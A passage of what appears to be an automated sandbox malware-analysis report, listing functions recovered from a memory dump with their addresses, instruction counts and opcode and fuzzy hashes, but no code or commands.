                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4c0efb1eb822d02c3799462a16d9eedbc1bb25b759f42d28237af00abda64c7
                                                      • Instruction ID: d7119ca001595731cb289a085fd9d68ebf4b935f8a11b8b2eb09ddd5ba0c8d94
                                                      • Opcode Fuzzy Hash: b4c0efb1eb822d02c3799462a16d9eedbc1bb25b759f42d28237af00abda64c7
                                                      • Instruction Fuzzy Hash: C3514BA191CF850FE75ADB6CC4051BA7BD0FF5A350F04C6BEE08EC3296DD68A8068781
                                                      Function 00007FFAC2B045B8 Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52d8dac6f2682039fba051554dcfb413e9c9665606fc5222217e634a7b40a971
                                                      • Instruction ID: db251ec94fb6f74204ffb321c22bb35a7488f20e07c13b5d0b83d3524df22213
                                                      • Opcode Fuzzy Hash: 52d8dac6f2682039fba051554dcfb413e9c9665606fc5222217e634a7b40a971
                                                      • Instruction Fuzzy Hash: E2515AB1E0CA494FE37AEB28C4065F577D1EF86250F14857DE48EC7395DD6AE8068381
                                                      Function 00007FFAC2AF883C Relevance: .2, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5d04cd0f5eb221da8235bb3683931a44e42a45d626a90b7be8b154a3595038f
                                                      • Instruction ID: 8d7c578cd7a087ffcacaa8c715de85b6d8f00cce0dd4adfa4780a98eca2d673a
                                                      • Opcode Fuzzy Hash: f5d04cd0f5eb221da8235bb3683931a44e42a45d626a90b7be8b154a3595038f
                                                      • Instruction Fuzzy Hash: DF519071918A5C8FDB59DF28D845BE9BBF1FF59310F0082AAD00DE3252DE74A9858F81
                                                      Function 00007FFAC2B03F6E Relevance: .2, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bed5990dffcae226ae9ea7af64d2092c57d42be2a55b24fdc0a8f168a9a9ab8
                                                      • Instruction ID: 1e42f25fdd130d5693eaecef4e447f6f7c53c040a90165e7df66dc0f23ab1bf1
                                                      • Opcode Fuzzy Hash: 6bed5990dffcae226ae9ea7af64d2092c57d42be2a55b24fdc0a8f168a9a9ab8
                                                      • Instruction Fuzzy Hash: 08518EB0B1CA4D4FDB48EF6CD845AB8B7E2EF49301F108179E44ED7396DE64A8428785
                                                      Function 00007FFAC2AF5590 Relevance: .2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f39a1cf709947d214fd2cc38e36ea050d8678aaf0e49a895a4ae5441a3c77ced
                                                      • Instruction ID: b844c5d88c1c047bfabadcb2c6758d41ccb952e93afa498152d8fecd96d66ab1
                                                      • Opcode Fuzzy Hash: f39a1cf709947d214fd2cc38e36ea050d8678aaf0e49a895a4ae5441a3c77ced
                                                      • Instruction Fuzzy Hash: 67512671E29A4D4FEB85EB7CC40A6BD7BD1EF46351B4440BAD00DCB3A7DE58A8418381
                                                      Function 00007FFAC2B01A5C Relevance: .2, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d76560cf4ec3431eefce1ffc1235e537c073d4c30dd8c65064e9c5b448ae9999
                                                      • Instruction ID: 026a73eec508afd8cde5e601935f0b6751409e01833ea795df238bb8af5185d7
                                                      • Opcode Fuzzy Hash: d76560cf4ec3431eefce1ffc1235e537c073d4c30dd8c65064e9c5b448ae9999
                                                      • Instruction Fuzzy Hash: D45190B0E1895D4FDB59EB6CC8062B977E1EF5A312F10417AD44EC3396EE64EC028781
                                                      Function 00007FFAC2AF5EA3 Relevance: .2, Instructions: 187COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5eb88bb3563881d7c70e88e3dc33d2ea78ce8d6651a720f7ba5e3499d6c053c
                                                      • Instruction ID: dc5a28e62068706879a083f7184a0b81e944e606c9d2adb3f7f044d1ff55d2d8
                                                      • Opcode Fuzzy Hash: f5eb88bb3563881d7c70e88e3dc33d2ea78ce8d6651a720f7ba5e3499d6c053c
                                                      • Instruction Fuzzy Hash: 1E519150F29A4A4BE799FB78841537966C2EF9A300F5582BAE01EC73D7DC6CAC414352
                                                      Function 00007FFAC2AFD107 Relevance: .2, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 305f83381d5cb1b6bdfd622726b84dfa10910455e238ee77147e2c9bc774af04
                                                      • Instruction ID: 7ffaa6868c38c594063b474ddf5931e2249a5b4550e21eda5105d73d528bd667
                                                      • Opcode Fuzzy Hash: 305f83381d5cb1b6bdfd622726b84dfa10910455e238ee77147e2c9bc774af04
                                                      • Instruction Fuzzy Hash: 5451026290D6D60FE712EF3CE8960F57BB0DF97225F1441B7D498CB297EC18A84A8391
                                                      Function 00007FFAC2AFCE08 Relevance: .2, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e25a786fcaa1ed314334dc6a579d38c23a60c1775833ce34b914f23c6227be2a
                                                      • Instruction ID: 3e324f5588e8379d8fa7d19a8e184072409fcf7f65401b766b4213126bea4759
                                                      • Opcode Fuzzy Hash: e25a786fcaa1ed314334dc6a579d38c23a60c1775833ce34b914f23c6227be2a
                                                      • Instruction Fuzzy Hash: 4841E853A0D2921AD702FF3CB8511E97BA0CF97275F2881B3D5DCCA287DC1CA4469390
                                                      Function 00007FFAC2AFD329 Relevance: .2, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f975bd75bfa76f143aa2d117287f4580912606815564fed81742089a4fd379f
                                                      • Instruction ID: a27a41d39c1b5f8cb1ecb2498819638e490d0798070b519817583ffd0f2263bc
                                                      • Opcode Fuzzy Hash: 7f975bd75bfa76f143aa2d117287f4580912606815564fed81742089a4fd379f
                                                      • Instruction Fuzzy Hash: 30412761A1EECA4FE786EB3C44141B43BE1EF9A21071885FED04DCB39ADE59A806C341
                                                      Function 00007FFAC2B0160D Relevance: .2, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 214dad8c2104a90ea1106c0677c7f2a617c6f1650090c413cfedfaa55ecbc634
                                                      • Instruction ID: d4a085cc36da01fe2f031dd57655568a3387cd9edfc36c6a103187e8a5d50ead
                                                      • Opcode Fuzzy Hash: 214dad8c2104a90ea1106c0677c7f2a617c6f1650090c413cfedfaa55ecbc634
                                                      • Instruction Fuzzy Hash: 9D51D0B1D1968A4FDB46EBB8C8155EDBBF0EF4A300F4481B6D04DE7386DE6CA8028751
                                                      Function 00007FFAC2AF75AD Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8421bcb6c1b2e745eeefe67c461f221d12a0aea5d746bfd4b354f3e84409cddb
                                                      • Instruction ID: 6be255365fc17771b8a106a74f5659215dc333a9c0ce266cfb3c06eec05d8681
                                                      • Opcode Fuzzy Hash: 8421bcb6c1b2e745eeefe67c461f221d12a0aea5d746bfd4b354f3e84409cddb
                                                      • Instruction Fuzzy Hash: 7741A252E2EA860FE79AAB7848292B86FD1EF57250F4440FAC48DCB3E7DD4C98458351
                                                      Function 00007FFAC2B045E7 Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 914ce66d631304c6b89d9f0bc3933d8279498a979f551b12518dfd815ddf0f71
                                                      • Instruction ID: 4202489976358d61ff3dcd98310bd9da19179cbea5506cf291fec6545be1571a
                                                      • Opcode Fuzzy Hash: 914ce66d631304c6b89d9f0bc3933d8279498a979f551b12518dfd815ddf0f71
                                                      • Instruction Fuzzy Hash: BE318971A08A5D8FDB56DF98D4506FDB7F0FF4A300B1440BAE40EE3392DA69AD018B51
                                                      Function 00007FFAC2B03D75 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb93588f310f5bbfb5c6eda949798ae16ae78af4a0b04de6ad3fd41d96ab619c
                                                      • Instruction ID: 7ad08e31aa3078e03818df42eec320a8619dba25cd4bea0740b18b6834191155
                                                      • Opcode Fuzzy Hash: cb93588f310f5bbfb5c6eda949798ae16ae78af4a0b04de6ad3fd41d96ab619c
                                                      • Instruction Fuzzy Hash: AD312CA1F1ED490FD78AEB7884595B93BE2EF9A200B1480BED04DC73E6CD6CD8018391
                                                      Function 00007FFAC2B01139 Relevance: .1, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8fe7e862f65cff7af5a34995d2de84afe085367be9920f9c9ebfafd08825dfb
                                                      • Instruction ID: 4c56f31f9b8484716bb1320ca2eb7af2ac2870ce3d8f95a8a9e33233f37b8a7b
                                                      • Opcode Fuzzy Hash: d8fe7e862f65cff7af5a34995d2de84afe085367be9920f9c9ebfafd08825dfb
                                                      • Instruction Fuzzy Hash: E731EF71A19A894FE749EB68C8546EDBBE2FF49310F5481BAE04DD7396CA29AC408740
                                                      Function 00007FFAC2AFC638 Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f380f16e1aea0144df8e996e6219c2c00778452c3b746b557e8eb5506f1d3c0e
                                                      • Instruction ID: b8df25ad6d22a3b7f243aec0473320d14b8d76a44ba91927dea18b843d4a1311
                                                      • Opcode Fuzzy Hash: f380f16e1aea0144df8e996e6219c2c00778452c3b746b557e8eb5506f1d3c0e
                                                      • Instruction Fuzzy Hash: 2821E471B1DA4D5FE784FB6CD449AB437D1EF59361B0140BAD04DCB2A2DD29EC418340
                                                      Function 00007FFAC2AFC685 Relevance: .1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91881d4fdaa0ee069066448d72235223ddf527674c8c890e24a57a97c1368591
                                                      • Instruction ID: c617950a283c48c39e30d4206a7ae0e8e9caeb656371cc684d92ad4043f81f37
                                                      • Opcode Fuzzy Hash: 91881d4fdaa0ee069066448d72235223ddf527674c8c890e24a57a97c1368591
                                                      • Instruction Fuzzy Hash: 8521F821A1DE8A0FE395EB3C88193B977E2DF86251B4940BAC48DC73D7DE5DAC428341
                                                      Function 00007FFAC2AF5964 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c0018d400bde38d1783c9efd87dd8e0cc0d62bc0cdc9ade1df0d677d3bed2c1
                                                      • Instruction ID: fca2cfa0ff634da0ed6a68716ebe7f8b4f3f7e76c6a64e8d9877d75a1ce2249b
                                                      • Opcode Fuzzy Hash: 9c0018d400bde38d1783c9efd87dd8e0cc0d62bc0cdc9ade1df0d677d3bed2c1
                                                      • Instruction Fuzzy Hash: BD210360D0EA8B4FDB86EB3888595FE7BF0EF56340B4444B6D09CCB297C92C9806D711
                                                      Function 00007FFAC2B11880 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed5b0fd08a902a1e6ca217d412516c79ddb026eaedbefcdd793ee138c102105e
                                                      • Instruction ID: 614b3e960fc20d8f8ee7ddcd3bac14f6c1cda0fbce3b099287b38d64c280588f
                                                      • Opcode Fuzzy Hash: ed5b0fd08a902a1e6ca217d412516c79ddb026eaedbefcdd793ee138c102105e
                                                      • Instruction Fuzzy Hash: 04118451B1C9190FE794E77CA8992B952C2DF99322B1445BBD40DC339ADC5D9C8243D1
                                                      Function 00007FFAC2AFD0E5 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c88be0fff1ee8cedb72871ed6a2bee22c87d3eaf396ae46675672e39070cae83
                                                      • Instruction ID: 43563bc806b36464fa1db7b1c5904f06560b929f9a6838782f93e68c85191e8a
                                                      • Opcode Fuzzy Hash: c88be0fff1ee8cedb72871ed6a2bee22c87d3eaf396ae46675672e39070cae83
                                                      • Instruction Fuzzy Hash: FB21366790C6954FE712BF3CD8960F63BA0DF97338B1081B6D5D98B267EC18B8078295
                                                      Function 00007FFAC2B0275D Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80ecd6b7982cbf63e8cc048d656ebcff0baeb870a7800efd641017b2268b03a9
                                                      • Instruction ID: f739f6ecb483755be75de0dc2c2c3ca9401fc51e047b825427ad47d020be23ba
                                                      • Opcode Fuzzy Hash: 80ecd6b7982cbf63e8cc048d656ebcff0baeb870a7800efd641017b2268b03a9
                                                      • Instruction Fuzzy Hash: 4621F3A1D18A4E0FDB85EBB8C8151FE7BE1EF59250F4045B6D00DD3387EE2CA9054751
                                                      Function 00007FFAC2AFD010 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed1f06ae7eb4215e79ebecb650fc93eae09e1c2ed000fb1aac0e4a90a8ae440f
                                                      • Instruction ID: 33b7003e49e898552dfe2855f2b901bd69c1035b52ec6d5afa72c0840461982b
                                                      • Opcode Fuzzy Hash: ed1f06ae7eb4215e79ebecb650fc93eae09e1c2ed000fb1aac0e4a90a8ae440f
                                                      • Instruction Fuzzy Hash: B61106B2A2CA1C1B932DAA6CAC0B0B6B7D4D787721B11423EE49FC3646EE50F81341D5
                                                      Function 00007FFAC2AF55B0 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e783c338be301dbb249c434fccef654efa5cdb8a8327203de20446762023272
                                                      • Instruction ID: f7b296b9eb138c304c37c6345556cb84d5bd53df838f6fc7d678e830f30feb6f
                                                      • Opcode Fuzzy Hash: 1e783c338be301dbb249c434fccef654efa5cdb8a8327203de20446762023272
                                                      • Instruction Fuzzy Hash: 9421CF21A2DB8A0FE758DB2C84161B97BD1EF4A205B0485BAE09EC7396CE6898018341
                                                      Function 00007FFAC2B0186D Relevance: .1, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 95eb6a254e8dff627434d11165b88907dc7bd24c6cde4f01ac1f3d49a12ebf38
                                                      • Instruction ID: 1a1a747b4f620f810d47310dece1a103deb9cecd4858e6786a5c893661b824e7
                                                      • Opcode Fuzzy Hash: 95eb6a254e8dff627434d11165b88907dc7bd24c6cde4f01ac1f3d49a12ebf38
                                                      • Instruction Fuzzy Hash: ED11D891E1DA890FE38DEB2C84296B967D1DF97250B04C1BBD04ECB3E6DD58AC068351
                                                      Function 00007FFAC2B042B9 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4981d25d009bc47ceb638874a403c3489589bd450f788673f35d70e64edbade
                                                      • Instruction ID: 6adcbb2d3bc5f330c125365aacecb496bcced1b534878ad0ddc864d7db1e8a90
                                                      • Opcode Fuzzy Hash: c4981d25d009bc47ceb638874a403c3489589bd450f788673f35d70e64edbade
                                                      • Instruction Fuzzy Hash: 1721BEA1D5D68A4FDB46AB7088150F9BFE0EF47200B0585FBD09CCB396DDAC95468351
                                                      Function 00007FFAC2AF5984 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f10fdef941abc765977f4c9f39d096fa4b677d58104593b36add4700f640cc5
                                                      • Instruction ID: 9661bb7caf63ce7786200bc7c10fac68d6a305cf710e4cb753059d07bddcaf53
                                                      • Opcode Fuzzy Hash: 8f10fdef941abc765977f4c9f39d096fa4b677d58104593b36add4700f640cc5
                                                      • Instruction Fuzzy Hash: F5219A20E1DA8E4FEB85FB7888541EA7BE1EF5A340F0048B2D409C7286DE2899048751
                                                      Function 00007FFAC2B02F99 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b63c655123c61a86163906987346278378d8ab96ccd10f94c08c1223cb60447f
                                                      • Instruction ID: 7a441252a2e2b2d1a0fde6b295cbeb7d396e6ae9f06c1453ae67a211fed96be4
                                                      • Opcode Fuzzy Hash: b63c655123c61a86163906987346278378d8ab96ccd10f94c08c1223cb60447f
                                                      • Instruction Fuzzy Hash: 2821B361E1DA8E0FDB42EB78C8151FE7BE1EF46210F4045B6D00DD72C6DE6898058391
                                                      Function 00007FFAC2B0411C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aded84ed9896b7df8f9aebc2b3bbfd53d101cf569d8d32ce6c5ea1c685fa0d61
                                                      • Instruction ID: 8daaec0a70a49f74214a02eb4dbd16dcebafb98c98136f523b7f1946a731789f
                                                      • Opcode Fuzzy Hash: aded84ed9896b7df8f9aebc2b3bbfd53d101cf569d8d32ce6c5ea1c685fa0d61
                                                      • Instruction Fuzzy Hash: 9721F060D0D6CA4FEB06AB7488161A9BFE1EF03250F4446F6C098C72D7EEBCA845C751
                                                      Function 00007FFAC2B0F9D0 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e70d5cb0a17263ad1860f1f2dbd5aef1f9e1727f73dc5faa933788884d387d59
                                                      • Instruction ID: 39db2bd7d455ab22eb57ecb8ab61310215552a059ef96abafea5110d3925cea9
                                                      • Opcode Fuzzy Hash: e70d5cb0a17263ad1860f1f2dbd5aef1f9e1727f73dc5faa933788884d387d59
                                                      • Instruction Fuzzy Hash: 2311C491B28A8A0FF398EB6C84593B695D1EF99340F5085BAE15EC33DBDC68DC068340
                                                      Function 00007FFAC2AFD52A Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2effb60623c6d4a1f487f6885788440b8567d6763a59babe63cae74d2499f148
                                                      • Instruction ID: a4cca6e2d812ff22ff29bcd11f77c728747fcd7bf15219649fdb92c0a85d3238
                                                      • Opcode Fuzzy Hash: 2effb60623c6d4a1f487f6885788440b8567d6763a59babe63cae74d2499f148
                                                      • Instruction Fuzzy Hash: 5231EE60D2F2C65DE701FFB4A8424E92EE0AF13251B428475F9BC9738BDDAC91348799
                                                      Function 00007FFAC2AF76A1 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6cbfc12615ea3ceb0898af7c589daf161a2cd2abec4ae0b5337476875d493fb8
                                                      • Instruction ID: a6cc809cb36ebda00730fc59bd6dae74cf4e89eb48a04d7ff9b5b8c053ba8c34
                                                      • Opcode Fuzzy Hash: 6cbfc12615ea3ceb0898af7c589daf161a2cd2abec4ae0b5337476875d493fb8
                                                      • Instruction Fuzzy Hash: 85012653F2EE890FE78AA77C1C181BC2BC1EB96290B4840B6D44CCB3D6DD0C9D864391
